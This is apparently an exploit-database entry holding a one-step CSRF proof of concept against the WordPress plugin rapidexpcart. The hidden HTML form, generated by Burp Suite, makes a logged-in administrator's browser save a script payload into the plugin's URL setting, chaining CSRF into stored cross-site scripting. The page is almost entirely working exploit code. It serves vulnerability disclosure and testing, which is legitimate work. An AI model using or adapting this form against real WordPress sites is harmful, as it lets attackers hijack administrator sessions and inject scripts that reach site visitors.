Share
## https://sploitus.com/exploit?id=WPEX-ID:BE4F7FF9-AF79-477B-9F47-E40E25A3558E
1. Save the following as .html file and open it in the browser where Administrator is logged in.
```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://172.28.128.6/wordpress/wp-admin/options-general.php?page=rapidexpcart%2Frapidexpcart.php" method="POST">
      <input type="hidden" name="&#95;action" value="save" />
      <input type="hidden" name="url" value="&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="key&#91;&#93;" value="product" />
      <input type="hidden" name="name&#91;&#93;" value="å&#149;&#134;å&#147;&#129;" />
      <input type="hidden" name="order&#91;&#93;" value="1" />
      <input type="hidden" name="key&#91;&#93;" value="cart" />
      <input type="hidden" name="name&#91;&#93;" value="ã&#130;&#171;ã&#131;&#188;ã&#131;&#136;" />
      <input type="hidden" name="order&#91;&#93;" value="2" />
      <input type="hidden" name="key&#91;&#93;" value="event" />
      <input type="hidden" name="name&#91;&#93;" value="" />
      <input type="hidden" name="order&#91;&#93;" value="3" />
      <input type="hidden" name="key&#91;&#93;" value="download" />
      <input type="hidden" name="name&#91;&#93;" value="" />
      <input type="hidden" name="order&#91;&#93;" value="4" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

```